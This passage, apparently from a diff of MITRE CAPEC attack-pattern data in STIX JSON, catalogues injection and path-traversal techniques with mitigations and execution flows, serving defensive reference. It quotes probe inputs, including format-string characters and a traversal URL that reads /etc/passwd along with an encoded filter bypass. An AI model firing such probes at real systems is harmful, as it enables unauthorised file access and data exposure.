"2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--007dc896-33a1-418f-8400-a4ae48f79658", + "modified": "2021-10-21T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--86466080-30aa-42b1-a6cc-f8103cf49498", + "spec_version": "2.1", + "target_ref": "attack-pattern--a0fc32ad-ef32-44d5-9937-5968f5e7b78c", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An adversary manipulates the headers and content of an email message by injecting data via the use of delimiter characters native to the protocol.", + "external_references": [ + { + "external_id": "CAPEC-134", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/134.html" + }, + { + "external_id": "CWE-150", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/150.html" + }, + { + "description": "Mail Command Injection", + "external_id": "30", + "source_name": "WASC", + "url": "http://projects.webappsec.org/Mail-Command-Injection" + } + ], + "id": "attack-pattern--3e3f4570-827b-4e0e-859b-00a4b13a1a65", + "modified": "2022-02-22T00:00:00.000Z", + "name": "Email Injection", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Standard", + "x_capec_child_of_refs": [ + "attack-pattern--cde07b71-23e6-418d-93e9-665f5f83b032" + ], + "x_capec_domains": [ + "Software" + ], + "x_capec_extended_description": "\n Many applications allow users to send email messages by filling in fields. 
For example, a web site may have a link to \"share this site with a friend\" where the user provides the recipient's email address and the web application fills out all the other fields, such as the subject and body. In this pattern, an adversary adds header and body information to an email message by injecting additional content in an input field used to construct a header of the mail message. This attack takes advantage of the fact that RFC 822 requires that headers in a mail message be separated by a carriage return. As a result, an adversary can inject new headers or content simply by adding a delimiting carriage return and then supplying the new heading and body information. This attack will not work if the user can only supply the message body since a carriage return in the body is treated as a normal character.\n ", + "x_capec_parent_of_refs": [ + "attack-pattern--30047c4f-cbf1-48ff-906c-3c6d58feb1a1" + ], + "x_capec_prerequisites": [ + "The target application must allow the user to send email to some recipient, to specify the content at least one header field in the message, and must fail to sanitize against the injection of command separators.", + "The adversary must have the ability to access the target mail application." + ], + "x_capec_resources_required": [ + "None: No specialized resources are required to execute this type of attack." + ], + "x_capec_status": "Draft", + "x_capec_typical_severity": "Medium", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An adversary includes formatting characters in a string input field on the target application. Most applications assume that users will provide static text and may respond unpredictably to the presence of formatting character. 
For example, in certain functions of the C programming languages such as printf, the formatting character %s will print the contents of a memory location expecting this location to identify a string and the formatting character %n prints the number of DWORD written in the memory. An adversary can use this to read or write to memory locations or files, or simply to manipulate the value of the resulting text in unexpected ways. Reading or writing memory may result in program crashes and writing memory could result in the execution of arbitrary code if the adversary can write to the program stack.", + "external_references": [ + { + "external_id": "CAPEC-135", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/135.html" + }, + { + "external_id": "CWE-134", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/134.html" + }, + { + "external_id": "CWE-20", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/20.html" + }, + { + "external_id": "CWE-74", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/74.html" + }, + { + "description": "Format string attack", + "source_name": "OWASP Attacks", + "url": "https://owasp.org/www-community/attacks/Format_string_attack" + }, + { + "description": "Hal Burch, Brendan Saulsbury, FIO30-C. 
Exclude user input from format strings, 2011--05, CERT", + "external_id": "REF-14", + "source_name": "reference_from_CAPEC", + "url": "https://www.securecoding.cert.org/confluence/display/seccode/FIO30-C.+Exclude+user+input+from+format+strings" + }, + { + "description": "Robert Auger, WASC Threat Classification 2.0, The Web Application Security Consortium (WASC)", + "external_id": "REF-15", + "source_name": "reference_from_CAPEC", + "url": "http://projects.webappsec.org/Format-String" + }, + { + "description": "OWASP Web Security Testing Guide, The Open Web Application Security Project (OWASP)", + "external_id": "REF-616", + "source_name": "reference_from_CAPEC", + "url": "https://owasp.org/www-project-web-security-testing-guide/latest/4-Web_Application_Security_Testing/07-Input_Validation_Testing/13-Testing_for_Format_String_Injection.html" + } + ], + "id": "attack-pattern--cbabea0a-39ed-4a6f-b752-238fe8c730af", + "modified": "2021-06-24T00:00:00.000Z", + "name": "Format String Injection", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Standard", + "x_capec_child_of_refs": [ + "attack-pattern--cde07b71-23e6-418d-93e9-665f5f83b032" + ], + "x_capec_consequences": { + "Access_Control": [ + "Bypass Protection Mechanism" + ], + "Confidentiality": [ + "Read Data" + ], + "Integrity": [ + "Modify Data", + "Execute Unauthorized Commands (Run Arbitrary Code)" + ] + }, + "x_capec_domains": [ + "Software" + ], + "x_capec_example_instances": [ + "Untrusted search path vulnerability in the add_filename_to_string function in intl/gettext/loadmsgcat.c for Elinks 0.11.1 allows local users to cause Elinks to use an untrusted gettext message catalog (.po file) in a \"../po\" directory, which can be leveraged to conduct format string attacks. See also: CVE-2007-2027" + ], + "x_capec_execution_flow": "

Execution Flow

Explore

  1. Survey application: The adversary takes an inventory of the entry points of the application.

  2. Techniques
    Spider web sites for all available links
    List parameters, external variables, configuration files variables, etc. that are possibly used by the application.

Experiment

  1. Determine user-controllable input susceptible to format string injection: Determine the user-controllable input susceptible to format string injection. For each user-controllable input that the adversary suspects is vulnerable to format string injection, attempt to inject formatting characters such as %n, %s, etc.. The goal is to manipulate the string creation using these formatting characters.

  2. Techniques
    Inject probe payload which contains formatting characters (%s, %d, %n, etc.) through input parameters.

Exploit

  1. Try to exploit the Format String Injection vulnerability: After determining that a given input is vulnerable to format string injection, hypothesize what the underlying usage looks like and the associated constraints.

  2. Techniques
    Insert various formatting characters to read or write the memory, e.g. overwrite return address, etc.
", + "x_capec_likelihood_of_attack": "High", + "x_capec_parent_of_refs": [ + "attack-pattern--4cd18074-15c1-4206-8391-115685669623" + ], + "x_capec_prerequisites": [ + "The target application must accept a strings as user input, fail to sanitize string formatting characters in the user input, and process this string using functions that interpret string formatting characters." + ], + "x_capec_resources_required": [ + "None: No specialized resources are required to execute this type of attack." + ], + "x_capec_skills_required": { + "High": "In order to discover format string vulnerabilities it takes only low skill, however, converting this discovery into a working exploit requires advanced knowledge on the part of the adversary." + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "High", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Limit the usage of formatting string functions.", + "id": "course-of-action--2fed494b-5a78-425c-acaa-11d9ffec4342", + "modified": "2021-06-24T00:00:00.000Z", + "name": "coa-135-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--d7b9dd8b-8e73-4e2b-ba24-d8b7c5a033ec", + "modified": "2021-06-24T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--2fed494b-5a78-425c-acaa-11d9ffec4342", + "spec_version": "2.1", + "target_ref": "attack-pattern--cbabea0a-39ed-4a6f-b752-238fe8c730af", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": 
"identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Strong input validation - All user-controllable input must be validated and filtered for illegal formatting characters.", + "id": "course-of-action--132cab4e-0189-4458-80c6-5fce45bee5b1", + "modified": "2021-06-24T00:00:00.000Z", + "name": "coa-135-1", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--dcb94cfe-e24f-4a9f-90fe-c4f2388067b2", + "modified": "2021-06-24T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--132cab4e-0189-4458-80c6-5fce45bee5b1", + "spec_version": "2.1", + "target_ref": "attack-pattern--cbabea0a-39ed-4a6f-b752-238fe8c730af", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An attacker manipulates or crafts an LDAP query for the purpose of undermining the security of the target. Some applications use user input to create LDAP queries that are processed by an LDAP server. For example, a user might provide their username during authentication and the username might be inserted in an LDAP query during the authentication process. An attacker could use this input to inject additional commands into an LDAP query that could disclose sensitive information. For example, entering a * in the aforementioned query might return information about all users on the system. 
This attack is very similar to an SQL injection attack in that it manipulates a query to gather additional information or coerce a particular return value.", + "external_references": [ + { + "external_id": "CAPEC-136", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/136.html" + }, + { + "external_id": "CWE-77", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/77.html" + }, + { + "external_id": "CWE-90", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/90.html" + }, + { + "external_id": "CWE-20", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/20.html" + }, + { + "description": "LDAP Injection", + "external_id": "29", + "source_name": "WASC", + "url": "http://projects.webappsec.org/LDAP-Injection" + }, + { + "description": "LDAP Injection", + "source_name": "OWASP Attacks", + "url": "https://owasp.org/www-community/attacks/LDAP_Injection" + }, + { + "description": "WASC Threat Classification 2.0, 2010, The Web Application Security Consortium (WASC)", + "external_id": "REF-17", + "source_name": "reference_from_CAPEC", + "url": "http://projects.webappsec.org/LDAP-Injection" + }, + { + "description": "OWASP Web Security Testing Guide, The Open Web Application Security Project (OWASP)", + "external_id": "REF-608", + "source_name": "reference_from_CAPEC", + "url": "https://owasp.org/www-project-web-security-testing-guide/latest/4-Web_Application_Security_Testing/07-Input_Validation_Testing/06-Testing_for_LDAP_Injection.html" + } + ], + "id": "attack-pattern--4b435e98-08cb-4464-bf08-32f95e011d05", + "modified": "2020-12-17T00:00:00.000Z", + "name": "LDAP Injection", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Standard", + "x_capec_child_of_refs": [ + "attack-pattern--2fb2b2b8-b7de-45a2-aadb-5849d12fda8f" + ], + "x_capec_consequences": { + 
"Access_Control": [ + "Bypass Protection Mechanism" + ], + "Accountability": [ + "Gain Privileges" + ], + "Authentication": [ + "Gain Privileges" + ], + "Authorization": [ + "Execute Unauthorized Commands (Run Arbitrary Code)", + "Gain Privileges", + "Bypass Protection Mechanism" + ], + "Availability": [ + "Unreliable Execution" + ], + "Confidentiality": [ + "Read Data" + ], + "Integrity": [ + "Modify Data" + ], + "Non-Repudiation": [ + "Gain Privileges" + ] + }, + "x_capec_domains": [ + "Software" + ], + "x_capec_example_instances": [ + "PowerDNS before 2.9.18, when running with an LDAP backend, does not properly escape LDAP queries, which allows remote attackers to cause a denial of service (failure to answer ldap questions) and possibly conduct an LDAP injection attack. See also: CVE-2005-2301" + ], + "x_capec_execution_flow": "

Execution Flow

Explore

  1. Survey application: The attacker takes an inventory of the entry points of the application.

  2. Techniques
    Spider web sites for all available links
    Sniff network communications with application using a utility such as WireShark.

Experiment

  1. Determine user-controllable input susceptible to LDAP injection: For each user-controllable input that the attacker suspects is vulnerable to LDAP injection, attempt to inject characters that have special meaning in LDAP (such as a single quote character, etc.). The goal is to create a LDAP query with an invalid syntax

  2. Techniques
    Use web browser to inject input through text fields or through HTTP GET parameters
    Use a web application debugging tool such as Tamper Data, TamperIE, WebScarab,etc. to modify HTTP POST parameters, hidden fields, non-freeform fields, or other HTTP header.
    Use modified client (modified by reverse engineering) to inject input.
  3. Try to exploit the LDAP injection vulnerability: After determining that a given input is vulnerable to LDAP Injection, hypothesize what the underlying query looks like. Possibly using a tool, iteratively try to add logic to the query to extract information from the LDAP, or to modify or delete information in the LDAP.

  4. Techniques
    Add logic to the LDAP query to change the meaning of that command. Automated tools could be used to generate the LDAP injection strings.
    Use a web application debugging tool such as Tamper Data, TamperIE, WebScarab,etc. to modify HTTP POST parameters, hidden fields, non-freeform fields, or other HTTP header.
", + "x_capec_likelihood_of_attack": "High", + "x_capec_prerequisites": [ + "The target application must accept a string as user input, fail to sanitize characters that have a special meaning in LDAP queries in the user input, and insert the user-supplied string in an LDAP query which is then processed." + ], + "x_capec_skills_required": { + "Medium": "The attacker needs to have knowledge of LDAP, especially its query syntax." + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "High", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Strong input validation - All user-controllable input must be validated and filtered for illegal characters as well as LDAP content.", + "id": "course-of-action--e5e6818b-d525-4ade-8d2e-11e4664731e6", + "modified": "2020-12-17T00:00:00.000Z", + "name": "coa-136-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--9f1eb213-9854-4530-b7ae-cb3659bd69ac", + "modified": "2020-12-17T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--e5e6818b-d525-4ade-8d2e-11e4664731e6", + "spec_version": "2.1", + "target_ref": "attack-pattern--4b435e98-08cb-4464-bf08-32f95e011d05", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Use of custom error pages - Attackers can glean information about the nature of queries from descriptive error messages. 
Input validation must be coupled with customized error pages that inform about an error without disclosing information about the LDAP or application.", + "id": "course-of-action--b1261793-b0f9-4ad7-90fb-d3f6a464ccfe", + "modified": "2020-12-17T00:00:00.000Z", + "name": "coa-136-1", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--674db528-648e-458e-81fc-e9ef0a61222e", + "modified": "2020-12-17T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--b1261793-b0f9-4ad7-90fb-d3f6a464ccfe", + "spec_version": "2.1", + "target_ref": "attack-pattern--4b435e98-08cb-4464-bf08-32f95e011d05", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An adversary manipulates the content of request parameters for the purpose of undermining the security of the target. Some parameter encodings use text characters as separators. For example, parameters in a HTTP GET message are encoded as name-value pairs separated by an ampersand (&). If an attacker can supply text strings that are used to fill in these parameters, then they can inject special characters used in the encoding scheme to add or modify parameters. For example, if user input is fed directly into an HTTP GET request and the user provides the value \"myInput&new_param=myValue\", then the input parameter is set to myInput, but a new parameter (new_param) is also added with a value of myValue. This can significantly change the meaning of the query that is processed by the server. 
Any encoding scheme where parameters are identified and separated by text characters is potentially vulnerable to this attack - the HTTP GET encoding used above is just one example.", + "external_references": [ + { + "external_id": "CAPEC-137", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/137.html" + }, + { + "external_id": "CWE-88", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/88.html" + } + ], + "id": "attack-pattern--cde07b71-23e6-418d-93e9-665f5f83b032", + "modified": "2019-04-04T00:00:00.000Z", + "name": "Parameter Injection", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Meta", + "x_capec_consequences": { + "Integrity": [ + "Modify Data (Successful parameter injection attacks mean a compromise to integrity of the application.)" + ] + }, + "x_capec_domains": [ + "Social Engineering", + "Software" + ], + "x_capec_likelihood_of_attack": "Medium", + "x_capec_parent_of_refs": [ + "attack-pattern--3e3f4570-827b-4e0e-859b-00a4b13a1a65", + "attack-pattern--cbabea0a-39ed-4a6f-b752-238fe8c730af", + "attack-pattern--e3a32913-a4a6-4a3c-8f3b-a8a6dc16df53", + "attack-pattern--582943a5-d66c-48a9-8cf8-76e511222c7d", + "attack-pattern--2a8824eb-4fd0-45a4-9c3c-af3fd7c5e0ca", + "attack-pattern--b97b706c-8b6e-4681-a22b-89d5e53134b7" + ], + "x_capec_prerequisites": [ + "The target application must use a parameter encoding where separators and parameter identifiers are expressed in regular text.", + "The target application must accept a string as user input, fail to sanitize characters that have a special meaning in the parameter encoding, and insert the user-supplied string in an encoding which is then processed." + ], + "x_capec_resources_required": [ + "None: No specialized resources are required to execute this type of attack. 
The only requirement is the ability to provide string input to the target." + ], + "x_capec_status": "Stable", + "x_capec_typical_severity": "Medium", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Implement an audit log written to a separate host. In the event of a compromise, the audit log may be able to provide evidence and details of the compromise.", + "id": "course-of-action--1b38336c-de87-49c0-9183-cdb80f9fb73b", + "modified": "2019-04-04T00:00:00.000Z", + "name": "coa-137-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--87d764be-a2f1-4a91-b9fb-61093b531c50", + "modified": "2019-04-04T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--1b38336c-de87-49c0-9183-cdb80f9fb73b", + "spec_version": "2.1", + "target_ref": "attack-pattern--cde07b71-23e6-418d-93e9-665f5f83b032", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Treat all user input as untrusted data that must be validated before use.", + "id": "course-of-action--96f190f9-bfce-4fbd-b4fd-9d07e68f3681", + "modified": "2019-04-04T00:00:00.000Z", + "name": "coa-137-1", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", 
+ "id": "relationship--f667d453-e763-41ac-ad05-bcda477818fd", + "modified": "2019-04-04T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--96f190f9-bfce-4fbd-b4fd-9d07e68f3681", + "spec_version": "2.1", + "target_ref": "attack-pattern--cde07b71-23e6-418d-93e9-665f5f83b032", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An adversary supplies a value to the target application which is then used by reflection methods to identify a class, method, or field. For example, in the Java programming language the reflection libraries permit an application to inspect, load, and invoke classes and their components by name. If an adversary can control the input into these methods including the name of the class/method/field or the parameters passed to methods, they can cause the targeted application to invoke incorrect methods, read random fields, or even to load and utilize malicious classes that the adversary created. 
This can lead to the application revealing sensitive information, returning incorrect results, or even having the adversary take control of the targeted application.", + "external_references": [ + { + "external_id": "CAPEC-138", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/138.html" + }, + { + "external_id": "CWE-470", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/470.html" + } + ], + "id": "attack-pattern--e3a32913-a4a6-4a3c-8f3b-a8a6dc16df53", + "modified": "2023-01-24T00:00:00.000Z", + "name": "Reflection Injection", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Standard", + "x_capec_child_of_refs": [ + "attack-pattern--cde07b71-23e6-418d-93e9-665f5f83b032" + ], + "x_capec_domains": [ + "Software" + ], + "x_capec_prerequisites": [ + "The target application must utilize reflection libraries and allow users to directly control the parameters to these methods. If the adversary can host classes where the target can invoke them, more powerful variants of this attack are possible.", + "The target application must accept a string as user input, fail to sanitize characters that have a special meaning in the parameter encoding, and insert the user-supplied string in an encoding which is then processed." + ], + "x_capec_resources_required": [ + "None: No specialized resources are required to execute this type of attack." + ], + "x_capec_status": "Draft", + "x_capec_typical_severity": "Very High", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An attacker exploits a weakness in input validation on the target by supplying a specially constructed path utilizing dot and slash characters for the purpose of obtaining access to arbitrary files or resources. 
An attacker modifies a known path on the target in order to reach material that is not available through intended channels. These attacks normally involve adding additional path separators (/ or \\) and/or dots (.), or encodings thereof, in various combinations in order to reach parent directories or entirely separate trees of the target's directory structure.", + "external_references": [ + { + "external_id": "CAPEC-139", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/139.html" + }, + { + "external_id": "CWE-23", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/23.html" + }, + { + "description": "OWASP Testing Guide (v4), 2010, The Open Web Application Security Project (OWASP)", + "external_id": "REF-9", + "source_name": "reference_from_CAPEC", + "url": "https://www.owasp.org/index.php/Testing_for_Path_Traversal_(OWASP-AZ-001)" + }, + { + "description": "WASC Threat Classification 2.0, 2010, The Web Application Security Consortium (WASC)", + "external_id": "REF-10", + "source_name": "reference_from_CAPEC", + "url": "http://projects.webappsec.org/w/page/13246952/Path-Traversal" + } + ], + "id": "attack-pattern--b2d76f31-f1e3-4797-a19f-246859422074", + "modified": "2022-09-29T00:00:00.000Z", + "name": "Relative Path Traversal", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--faf0ec21-da60-4efc-8c8e-7a6b63bea170" + ], + "x_capec_consequences": { + "Access_Control": [ + "Bypass Protection Mechanism" + ], + "Availability": [ + "Execute Unauthorized Commands (Run Arbitrary Code)", + "Unreliable Execution" + ], + "Confidentiality": [ + "Read Data", + "Execute Unauthorized Commands (Run Arbitrary Code)" + ], + "Integrity": [ + "Modify Data", + "Execute Unauthorized Commands (Run Arbitrary Code)" + ] + }, + "x_capec_domains": [ + "Software" + 
], + "x_capec_example_instances": [ + "\n The attacker uses relative path traversal to access files in the application. This is an example of accessing user's password file.\n http://www.example.com/getProfile.jsp?filename=../../../../etc/passwd\n However, the target application employs regular expressions to make sure no relative path sequences are being passed through the application to the web page. The application would replace all matches from this regex with the empty string.\n Then an attacker creates special payloads to bypass this filter:\n http://www.example.com/getProfile.jsp?filename=%2e%2e/%2e%2e/%2e%2e/%2e%2e /etc/passwd\n When the application gets this input string, it will be the desired vector by the attacker.\n " + ], + "x_capec_execution_flow": "

Execution Flow

Explore

  1. Fingerprinting of the operating system: In order to perform a valid path traversal, the adversary needs to know what the underlying OS is so that the proper file seperator is used.

  2. Techniques
    Port mapping. Identify ports that the system is listening on, and attempt to identify inputs and protocol types on those ports.
    TCP/IP Fingerprinting. The adversary uses various software to make connections or partial connections and observe idiosyncratic responses from the operating system. Using those responses, they attempt to guess the actual operating system.
    Induce errors to find informative error messages
  3. Survey application: Using manual or automated means, an adversary will survey the target application looking for all areas where user input is taken to specify a file name or path.

  4. Techniques
    Use a spidering tool to follow and record all links on a web page. Make special note of any links that include parameters in the URL.
    Use a proxy tool to record all links visited during a manual traversal of a web application. Make special note of any links that include parameters in the URL. Manual traversal of this type is frequently necessary to identify forms that are GET method forms rather than POST forms.
    Use a browser to manually explore a website and analyze how it is constructed. Many browser plug-ins are available to facilitate the analysis or automate the URL discovery.

Experiment

  1. Attempt variations on input parameters: Using manual or automated means, an adversary attempts varying relative file path combinations on all found user input locations and observes the responses.

  2. Techniques
    Provide \"../\" or \"..\\\" at the beginning of any filename to traverse to the parent directory
    Use a list of probe strings as path traversal payload. Different strings may be used for different platforms. Strings contain relative path sequences such as \"../\".
    Use a proxy tool to record results of manual input of relative path traversal probes in known URLs.

Exploit

  1. Access, modify, or execute arbitrary files.: An adversary injects path traversal syntax into identified vulnerable inputs to cause inappropriate reading, writing or execution of files. An adversary could be able to read directories or files which they are normally not allowed to read. The adversary could also access data outside the web document root, or include scripts, source code and other kinds of files from external websites. Once the adversary accesses arbitrary files, they could also modify files. In particular situations, the adversary could also execute arbitrary code or system commands.

  2. Techniques
    Manipulate file and its path by injecting relative path sequences (e.g. \"../\").
    Download files, modify files, or try to execute shell commands (with binary files).
", + "x_capec_likelihood_of_attack": "High", + "x_capec_prerequisites": [ + "The target application must accept a string as user input, fail to sanitize combinations of characters in the input that have a special meaning in the context of path navigation, and insert the user-supplied string into path navigation commands." + ], + "x_capec_skills_required": { + "High": "To bypass non trivial filters in the application", + "Low": "To inject the malicious payload in a web page" + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "High", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Design: Input validation. Assume that user inputs are malicious. Utilize strict type, character, and encoding enforcement", + "id": "course-of-action--03927772-a50c-42a3-b4ff-f72892917b5e", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-139-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--00ca197d-8e7f-4dc6-ab81-53dcf255f9f1", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--03927772-a50c-42a3-b4ff-f72892917b5e", + "spec_version": "2.1", + "target_ref": "attack-pattern--b2d76f31-f1e3-4797-a19f-246859422074", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--cbcc574c-56af-4a8a-b9c0-d5b4d59b58ed", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + 
